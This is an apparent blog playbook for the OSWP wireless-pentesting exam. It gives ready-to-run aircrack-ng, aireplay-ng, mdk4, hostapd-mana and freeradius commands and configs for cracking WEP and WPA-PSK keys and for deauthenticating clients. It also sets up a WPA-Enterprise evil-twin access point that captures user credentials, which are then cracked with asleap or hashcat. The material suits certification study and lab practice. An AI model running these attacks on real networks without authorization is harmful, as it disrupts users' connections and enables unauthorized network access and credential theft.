Zeyad Azima

Zeyad Azima

Brain Storming Stuff (Exploit Development, Reverse Engineering & More)

OSWP PlayBook: (Offensive Security Wireless Professional)

7 minute read

Summary

Kudos to my friend @Abdulrahman for starting the first version of the playbook and after contributing together we update it with organized structure, More steps and practicality. You can download the PDF version of the book fro here.

Contact & Follow Us

     
Github Abdulrahman Zeyad
Linkedin Abdulrahman Zeyad
Twitter/X Abdulrahman Zeyad
Website   Zeyad
Email 0xexploiteagle@gmail.com contact@zeyadazima.com

Follow The PlayBook Updates

Reconnaissance

Setup Interfaces

  • Set Interface to monitor mode
sudo airmon-ng check kill && sudo airmon-ng start <interface>
  • Set Interface to managed mode
sudo airmon-ng stop <interface>

Monitor Networks

  • Monitor Networks
sudo airodump-ng --band abg --manufacturer <interface_in_mointor_mode>
  • Monitor Networks including WPS
sudo airodump-ng --band abg --manufacturer --wps <interface_in_mointor_mode>
  • Monitor Specific Network/BSSID
sudo airodump-ng --band abg --manufacturer --bssid <BSSID> -c <channel> <interface_in_mointor_mode>

Discover Hidden Networks

  • Get hidden Network ESSID using BSSID
sudo airodump-ng --band abg --bssid <mac> wlan0mon
  • Get hidden Network w/ Bruteforcing 
    mdk4 wlan0mon p -t <BSSID> -f <wordlist>

Change Channel

  • The interface has to be in monitor mode:
sudo iwconfig <interface_in_mointor_mode> channel <number>

Change MAC Address

  1. Stop network manager
    systemctl stop network-manager
  2. Stop Interface
    ip link set wlan0 down
  3. Change the MAC address
    macchanger -m <new_mac_address> <interface>
  4. Start Interface
    ip link set wlan0 up

Tips

If not succeed in this case may

  1. interface name is wrong
  2. your interface in monitor mode
    In second case to fix it set it to managed mode:
    sudo airmon-ng stop <int>

Connecting to Networks

Connect to Open Network

open.conf

network={
    ssid="Open_Network_Name"
    key_mgmt=NONE
}

Set ssid to the network name you want to connect to. Then, Save it to open.conf and connect using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request ip from the DHCP server:

sudo dhclient wlan0 -v

Connect to WPA(1/2/3) Networks

WPA

network={
    ssid="SSID"
    psk="password"
    scan_ssid=1
    key_mgmt=WPA-PSK
    proto=WPA2
}

for the proto set it to the WPA(version):

  • WPA
  • WPA2
  • WPA3

Set ssid to the network name you want to connect to. Then, Save it to wpa.conf and connect using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request ip from the DHCP server:

sudo dhclient wlan0 -v

Connect to WPA Enterprise

network={
  ssid="SSID"
  scan_ssid=1
  key_mgmt=WPA-EAP
  eap=PEAP
  identity="identity\user"
  password="password"
  phase1="peaplabel=0"
  phase2="auth=MSCHAPV2"
}

set identity to the username, and password to the password.
Set ssid to the network name you want to connect to. Then, Save it to wpa_entp.conf and connect using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request ip from the DHCP server:

sudo dhclient wlan0 -v

Connect to WEP Network

network={
  ssid="SSID"
  key_mgmt=NONE
  wep_key0=""
  wep_tx_keyidx=0
}

Note : Password(wep_key0) in WEP should be lowercase if hex and without ""
Capital also works in hex password

Set ssid to the network name you want to connect to. Then, Save it to wep.conf and connect using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request ip from the DHCP server:

sudo dhclient wlan0 -v

Attacking Networks

Attacking WEP Networks

image

  1. Capture packets with the WEP network info
sudo airodump-ng -w <pcap_file_name> --band abg --bssid <mac> -c <channel> wlan0mon

image

  1. Send fake authentication
sudo aireplay-ng -1 0 -a <BSSID> -h <Interface_Mac> -e "ESSID" <Interface>

Note: The interface mac address you can use anything also you if you would like to spoof one

image

  1. ARPreplay Attack
sudo aireplay-ng --arpreplay -b <BSSID> -h <Interface_mac_address> <interface_in_mointor_mode>

image

  1. Crack password
sudo aircrack-ng wep-01.cap

image

Attacking WPA-PSK Networks

  1. Gathering information of the target network like the Channel , BSSID
sudo airodump-ng --band abg <interface_in_mointor_mode>

image

The above network type is WPA1 as there is no version appered

  1. Capture Handshake
sudo airodump-ng <interface_in_monitor_mode> --bssid <BSSID> -c <channel> -w <pcap_file_name>

image

  1. Perform De-authentication attack (kick a spasific client from the network to get the handshake)
sudo aireplay-ng -0 5 -c <client-mac> -a <BSSID>  <interface_in_mointor_mode>

Note: Delete -c option if you want to do it in broadcast (Kick all clients)

image

  1. Wait till get the handshake

image

  1. After getting EAPOL ( Handshake), We will crack the password using aircrack-ng
sudo aircrack-ng -w <wordlist> capfile.cap

Connect to the network using connecting to networks section

image

Attacking WPA-Enterprise

  1. First, We gather information about the network like BSSID , channel to filter the networks using:
sudo airodump-ng --band abg <interface_in_mointor_mode>

image

  1. Then we gather handshake for the enterprise network
sudo airodump-ng --band abg -c x --bssid <BSSID> -w <pcap_file_name> <interface_in_mointor_mode>

image

  1. After that we look at clients of the network and try to De-authenticate a client to get PMKID for the network:
sudo aireplay-ng -0 4 -a <BSSID> -c <client_mac> <interface_in_mointor_mode>

Then we wait till we get handshake, In some cases we can wait client to connect.

image

  1. After we get it we go through cap file and extract the IDENTITY USER

image

  1. Extract the Certificate

image

Note: Save the cert in der as the following

image

  1. We also display information of certificate using this command
openssl x509 -inform der -in CERTIFICATE_FILENAME -text

image

  1. Fake the network using freeradius
    We go to /etc/freeradius/3.0/certs path, Then we change the following 2 files with information we obtained from the certificate:
nano ca.cnf

image

nano server.cnf

image

  1. After that we do the following commands under /etc/freeradius/3.0/certs to generate Diffie Hellman key for hostapd-mana
rm dh
make

image

You may encounter error as the following, You can ignore it

image

10 . We create EAP user filename mana.eap_user

*	PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    "pass"   [2]

image

  1. After that we create a fake access point by creating a file called network.conf under any other directory
  2. We paste the following configurations in the file and modify it to our needs:
ssid=<ESSID>
interface=<managed_mode_interface>
driver=nl80211

channel=<channel>
hw_mode=a
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0

eap_user_file=/etc/hostapd-mana/mana.eap_user

ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key

private_key_passwd=whatever

dh_file=/etc/freeradius/3.0/certs/dh


auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP


wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1

image

  1. Turn the interface to managed mode again

  2. Then use the following command to create fake AP

sudo hostapd-mana <file.conf>

image

  1. Perform De-authentication attack (kick a spasific client from the network to get the handshake), Using another interface:
sudo aireplay-ng -0 0 -c <client-mac> -a <BSSID>  <interface_in_mointor_mode>

Note: Delete -c option if you want to do it in broadcast (Kick all clients)
You need to use another interface in monitor mode, Also you need to set the interface to the same channel as the target network before performing the De-authenticate attack, As the following:

image

Tip: If there are 2 Enterprise network with the same name, You need to perform the De-authenticate attack on both of the networks.

  1. then once you get handshake you will copy and paste command of asleep and adding -W /path/to/wordlist
asleap -C do:3b:8d:7b:22:00:0:91 -R 68:09:13:ac:e8:df:36:5f:42:94:fb:97:91:05:2:21:72:ff:b3:ce:c0:ca:26:f7 -W /usr/share/john/password.lst

image

Note: if it doesn’t work with you can get the hash of the Hashcat tool and put it in file called hashfile and use this command to crack it
hashcat -a 0 -m 5500 hashfile rockyou.txt --force

image

  1. After getting username and password here you go for connecting to the network section.

Install Required Tools & Packages:

FreeRADIUS

sudo apt update
sudo apt install freeradius freeradius-utils

Hostapd-Mana

sudo apt update
sudo apt install libssl-dev libnl-3-dev libnl-genl-3-dev
git clone https://github.com/sensepost/hostapd-mana.git
cd hostapd-mana/hostapd
make
sudo make install

Aircrack-ng

sudo apt update
sudo apt install aircrack-ng

Asleap

sudo apt update
sudo apt install asleap

Hashcat

sudo apt update
sudo apt install hashcat

John the Ripper

sudo apt update
sudo apt install john

Resources & Labs

Resources

Labs and Linux Dist

Labs 5.2.1

  • https://wifichallengelab.com
  • https://github.com/r4ulcl/WiFiChallengeLab-docker

Note: For this lab you won’t need any physical cards or anything all performed through, The labs virtual machine include everything, shoutout for r4ulcl for this amazing lab.

Linux Dist

  • https://www.wifislax.com: Wireless Pentest OS

Tags:

Categories:

Updated: